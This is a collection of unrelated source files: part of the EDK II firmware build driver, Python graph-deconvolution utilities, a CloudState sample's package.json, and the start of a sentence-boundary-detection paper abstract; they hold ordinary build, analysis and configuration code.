if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print >> toolsFile, ' '.join(guidedSectionTool)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
self.BuildModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache == None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase == None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList != None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__,version=__version__,prog="build.exe",usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32','X64','IPF','EBC','ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. Less than 2 will disable multi-thread builds.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
# VBox start
global gBuildConfiguration;
TargetTxtFile = gBuildConfiguration;
if 'VBOX_TARGET_CONF' in os.environ:
TargetTxtFile = os.path.abspath(os.environ['VBOX_TARGET_CONF']);
Parser.add_option("--vbox-target-conf", action="store", dest="VBoxTargetConf", default=TargetTxtFile,
help="Override %s location." % (gBuildConfiguration,), metavar="VBoxTargetConf")
# VBox end
(Opt, Args)=Parser.parse_args()
# VBox start - again
if TargetTxtFile != Opt.VBoxTargetConf:
gBuildConfiguration = os.path.abspath(Opt.VBoxTargetConf)
os.environ['VBOX_TARGET_CONF'] = gBuildConfiguration # for the other tools.
# VBox end
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose != None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet != None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug != None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile != None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile != None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile != None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag != None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
except FatalError, X:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError = False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb != None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to [email protected] for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
Conclusion = "Done"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)"%(BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild != None:
MyBuild.BuildReport.GenerateReport(BuildDurationStr)
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
| {
"pile_set_name": "Github"
} |
"""Utilities for graph not included in Networkx.
.. MIT License
..
.. Copyright (c) 2018 Diviyan Kalainathan
..
.. Permission is hereby granted, free of charge, to any person obtaining a copy
.. of this software and associated documentation files (the "Software"), to deal
.. in the Software without restriction, including without limitation the rights
.. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
.. copies of the Software, and to permit persons to whom the Software is
.. furnished to do so, subject to the following conditions:
..
.. The above copyright notice and this permission notice shall be included in all
.. copies or substantial portions of the Software.
..
.. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
.. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
.. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
.. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
.. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
.. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
.. SOFTWARE.
"""
import networkx as nx
from copy import deepcopy
import operator
import numpy as np
import scipy.stats.mstats as stat
from numpy import linalg as LA
def network_deconvolution(mat, **kwargs):
"""Python implementation/translation of network deconvolution by MIT-KELLIS LAB.
.. note::
For networkx graphs, use the cdt.utils.graph.remove_indirect_links function
code author:gidonro [Github username](https://github.com/gidonro/Network-Deconvolution)
LICENSE: MIT-KELLIS LAB
AUTHORS:
Algorithm was programmed by Soheil Feizi.
Paper authors are S. Feizi, D. Marbach, M. M?©dard and M. Kellis
Python implementation: Gideon Rosenthal
For more details, see the following paper:
Network Deconvolution as a General Method to Distinguish
Direct Dependencies over Networks
By: Soheil Feizi, Daniel Marbach, Muriel Médard and Manolis Kellis
Nature Biotechnology
Args:
mat (numpy.ndarray): matrix, if it is a square matrix, the program assumes
it is a relevance matrix where mat(i,j) represents the similarity content
between nodes i and j. Elements of matrix should be
non-negative.
beta (float): Scaling parameter, the program maps the largest absolute eigenvalue
of the direct dependency matrix to beta. It should be
between 0 and 1.
alpha (float): fraction of edges of the observed dependency matrix to be kept in
deconvolution process.
control (int): if 0, displaying direct weights for observed
interactions, if 1, displaying direct weights for both observed and
non-observed interactions.
Returns:
numpy.ndarray: Output deconvolved matrix (direct dependency matrix). Its components
represent direct edge weights of observed interactions.
Choosing top direct interactions (a cut-off) depends on the application and
is not implemented in this code.
Example:
>>> from cdt.utils.graph import network_deconvolution
>>> import networkx as nx
>>> # Generate sample data
>>> from cdt.data import AcyclicGraphGenerator
>>> graph = AcyclicGraphGenerator(linear).generate()[1]
>>> adj_mat = nx.adjacency_matrix(graph).todense()
>>> output = network_deconvolution(adj_mat)
.. note::
To apply ND on regulatory networks, follow steps explained in Supplementary notes
1.4.1 and 2.1 and 2.3 of the paper.
In this implementation, input matrices are made symmetric.
"""
alpha = kwargs.get('alpha', 1)
beta = kwargs.get('beta', 0.99)
control = kwargs.get('control', 0)
# ToDO : ASSERTS
try:
assert beta < 1 or beta > 0
assert alpha <= 1 or alpha > 0
except AssertionError:
raise ValueError("alpha must be in ]0, 1] and beta in [0, 1]")
# Processing the input matrix, diagonal values are filtered
np.fill_diagonal(mat, 0)
# Thresholding the input matrix
y = stat.mquantiles(mat[:], prob=[1 - alpha])
th = mat >= y
mat_th = mat * th
# Making the matrix symetric if already not
mat_th = (mat_th + mat_th.T) / 2
# Eigen decomposition
Dv, U = LA.eigh(mat_th)
D = np.diag((Dv))
lam_n = np.abs(np.min(np.min(np.diag(D)), 0))
lam_p = np.abs(np.max(np.max(np.diag(D)), 0))
m1 = lam_p * (1 - beta) / beta
m2 = lam_n * (1 + beta) / beta
m = max(m1, m2)
# network deconvolution
for i in range(D.shape[0]):
D[i, i] = (D[i, i]) / (m + D[i, i])
mat_new1 = np.dot(U, np.dot(D, LA.inv(U)))
# Displying direct weights
if control == 0:
ind_edges = (mat_th > 0) * 1.0
ind_nonedges = (mat_th == 0) * 1.0
m1 = np.max(np.max(mat * ind_nonedges))
m2 = np.min(np.min(mat_new1))
mat_new2 = (mat_new1 + np.max(m1 - m2, 0)) * ind_edges + (mat * ind_nonedges)
else:
m2 = np.min(np.min(mat_new1))
mat_new2 = (mat_new1 + np.max(-m2, 0))
# linearly mapping the deconvolved matrix to be between 0 and 1
m1 = np.min(np.min(mat_new2))
m2 = np.max(np.max(mat_new2))
mat_nd = (mat_new2 - m1) / (m2 - m1)
return mat_nd
def clr(M, **kwargs):
"""Implementation of the Context Likelihood or Relatedness Network algorithm.
.. note::
For networkx graphs, use the cdt.utils.graph.remove_indirect_links function
Args:
mat (numpy.ndarray): matrix, if it is a square matrix, the program assumes
it is a relevance matrix where mat(i,j) represents the similarity content
between nodes i and j. Elements of matrix should be
non-negative.
Returns:
numpy.ndarray: Output deconvolved matrix (direct dependency matrix). Its components
represent direct edge weights of observed interactions.
Example:
>>> from cdt.utils.graph import clr
>>> import networkx as nx
>>> # Generate sample data
>>> from cdt.data import AcyclicGraphGenerator
>>> graph = AcyclicGraphGenerator(linear).generate()[1]
>>> adj_mat = nx.adjacency_matrix(graph).todense()
>>> output = clr(adj_mat)
.. note::
Ref:Jeremiah J. Faith, Boris Hayete, Joshua T. Thaden, Ilaria Mogno, Jamey
Wierzbowski, Guillaume Cottarel, Simon Kasif, James J. Collins, and Timothy
S. Gardner. Large-scale mapping and validation of escherichia coli
transcriptional regulation from a compendium of expression profiles.
PLoS Biology, 2007
"""
R = np.zeros(M.shape)
Id = [[0, 0] for i in range(M.shape[0])]
for i in range(M.shape[0]):
mu_i = np.mean(M[i, :])
sigma_i = np.std(M[i, :])
Id[i] = [mu_i, sigma_i]
for i in range(M.shape[0]):
for j in range(i + 1, M.shape[0]):
z_i = np.max([0, (M[i, j] - Id[i][0]) / Id[i][0]])
z_j = np.max([0, (M[i, j] - Id[j][0]) / Id[j][0]])
R[i, j] = np.sqrt(z_i**2 + z_j**2)
R[j, i] = R[i, j] # Symmetric
return R
def aracne(m, **kwargs):
"""Implementation of the ARACNE algorithm.
.. note::
For networkx graphs, use the cdt.utils.graph.remove_indirect_links function
Args:
mat (numpy.ndarray): matrix, if it is a square matrix, the program assumes
it is a relevance matrix where mat(i,j) represents the similarity content
between nodes i and j. Elements of matrix should be
non-negative.
Returns:
numpy.ndarray: Output deconvolved matrix (direct dependency matrix). Its components
represent direct edge weights of observed interactions.
Example:
>>> from cdt.utils.graph import aracne
>>> import networkx as nx
>>> # Generate sample data
>>> from cdt.data import AcyclicGraphGenerator
>>> graph = AcyclicGraphGenerator(linear).generate()[1]
>>> adj_mat = nx.adjacency_matrix(graph).todense()
>>> output = aracne(adj_mat)
.. note::
Ref: ARACNE: An Algorithm for the Reconstruction of Gene Regulatory Networks in a Mammalian Cellular Context
Adam A Margolin, Ilya Nemenman, Katia Basso, Chris Wiggins, Gustavo Stolovitzky, Riccardo Dalla Favera and Andrea Califano
DOI: https://doi.org/10.1186/1471-2105-7-S1-S7
"""
I0 = kwargs.get('I0', 0.0) # No default thresholding
W0 = kwargs.get('W0', 0.05)
# thresholding
m = np.where(m > I0, m, 0)
# Finding triplets and filtering them
for i in range(m.shape[0]-2):
for j in range(i+1, m.shape[0]-1):
for k in range(j+1, m.shape[0]):
triplet = [m[i, j], m[j, k], m[i, k]]
min_index, min_value = min(enumerate(triplet), key=operator.itemgetter(1))
if 0 < min_value < W0:
if min_index == 0:
m[i, j] = m[j, i] = 0.
elif min_index == 1:
m[j, k] = m[k, j] = 0.
else:
m[i, k] = m[k, i] = 0.
return m
def remove_indirect_links(g, alg="aracne", **kwargs):
"""Apply deconvolution to a networkx graph.
Args:
g (networkx.Graph): Graph to apply deconvolution to
alg (str): Algorithm to use ('aracne', 'clr', 'nd')
kwargs (dict): extra options for algorithms
Returns:
networkx.Graph: graph with undirected links removed.
Example:
>>> from cdt.utils.graph import remove_indirect_links
>>> import networkx as nx
>>> # Generate sample data
>>> from cdt.data import AcyclicGraphGenerator
>>> graph = AcyclicGraphGenerator(linear).generate()[1]
>>> output = remove_indirect_links(graph, alg='aracne')
"""
alg = {"aracne": aracne,
"nd": network_deconvolution,
"clr": clr}[alg]
order_list = list(g.nodes())
mat = np.array(nx.adjacency_matrix(g, nodelist=order_list).todense())
return nx.relabel_nodes(nx.DiGraph(alg(mat, **kwargs)),
{idx: i for idx, i in enumerate(order_list)})
def dagify_min_edge(g):
"""Input a graph and output a DAG.
The heuristic is to reverse the edge with the lowest score of the cycle
if possible, else remove it.
Args:
g (networkx.DiGraph): Graph to modify to output a DAG
Returns:
networkx.DiGraph: DAG made out of the input graph.
Example:
>>> from cdt.utils.graph import dagify_min_edge
>>> import networkx as nx
>>> import numpy as np
>>> # Generate sample data
>>> graph = nx.DiGraph((np.ones(4) - np.eye(4)) *
np.random.uniform(size=(4,4)))
>>> output = dagify_min_edge(graph)
"""
ncycles = len(list(nx.simple_cycles(g)))
while not nx.is_directed_acyclic_graph(g):
cycle = next(nx.simple_cycles(g))
edges = [(cycle[-1], cycle[0])]
scores = [(g[cycle[-1]][cycle[0]]['weight'])]
for i, j in zip(cycle[:-1], cycle[1:]):
edges.append((i, j))
scores.append(g[i][j]['weight'])
i, j = edges[scores.index(min(scores))]
gc = deepcopy(g)
gc.remove_edge(i, j)
gc.add_edge(j, i)
ngc = len(list(nx.simple_cycles(gc)))
if ngc < ncycles:
g.add_edge(j, i, weight=min(scores))
g.remove_edge(i, j)
ncycles = ngc
return g
| {
"pile_set_name": "Github"
} |
{
"name": "js-shopping-cart",
"version": "0.1.0",
"description": "Sample CloudState event sourced shopping cart application",
"keywords": [
"serverless",
"cloudstate",
"event-sourcing"
],
"engineStrict": true,
"engines": {
"node": "~12"
},
"homepage": "https://github.com/cloudstateio/cloudstate",
"bugs": {
"url": "https://github.com/cloudstateio/cloudstate/issues"
},
"license": "Apache-2.0",
"author": {
"name": "James Roper",
"email": "[email protected]",
"url": "https://jazzy.id.au"
},
"repository": {
"type": "git",
"url": "https://github.com/cloudstateio/cloudstate",
"directory": "src/samples/js-shopping-cart"
},
"//": "https://npm.community/t/npm-install-does-not-install-transitive-dependencies-of-local-dependency/2264",
"dependencies": {
"@grpc/proto-loader": "^0.1.0",
"cloudstate": "file:../../node-support",
"google-protobuf": "^3.11.4",
"grpc": "^1.24.2"
},
"devDependencies": {
"chai": "4.2.0",
"mocha": "^6.2.3"
},
"scripts": {
"test": "mocha",
"prestart": "compile-descriptor ../../protocols/example/shoppingcart/shoppingcart.proto",
"pretest": "compile-descriptor ../../protocols/example/shoppingcart/shoppingcart.proto",
"postinstall": "compile-descriptor ../../protocols/example/shoppingcart/shoppingcart.proto",
"prepare-node-support": "cd ../../node-support && npm install && cd ../samples/js-shopping-cart",
"start": "node index.js",
"start-no-prestart": "node index.js",
"dockerbuild": "npm run prepare-node-support && docker build -f ../../Dockerfile.js-shopping-cart -t ${DOCKER_PUBLISH_TO:-cloudstateio}/js-shopping-cart:latest ../..",
"dockerpush": "docker push ${DOCKER_PUBLISH_TO:-cloudstateio}/js-shopping-cart:latest",
"dockerbuildpush": "npm run dockerbuild && npm run dockerpush"
}
}
| {
"pile_set_name": "Github"
} |
<PAPER>
<S sid="0">A Maximum Entropy Approach To Identifying Sentence Boundaries</S>
<ABSTRACT>
<S sid="1" ssid="1">We present a trainable model for identifying sentence boundaries in raw text.</S>
<S sid="2" ssid="2">Given a corpus annotated with sentence boundaries, our model learns to classify each occurrence of., ?, and !as either a valid or invalid sentence boundary.</S>
<S sid="3" ssid="3">The training procedure requires no hand-crafted rules, lexica, part-of-speech tags, or domain-specific information.</S>
<S sid="4" ssid="4">The model can therefore be trained easily on any genre of English, and should be trainable on any other Romanalphabet language.</S>
<S sid="5" ssid="5">Performance is comparable to or better than the performance of similar systems, but we emphasize the simplicity of retraining for new domains.</S>
</ABSTRACT>
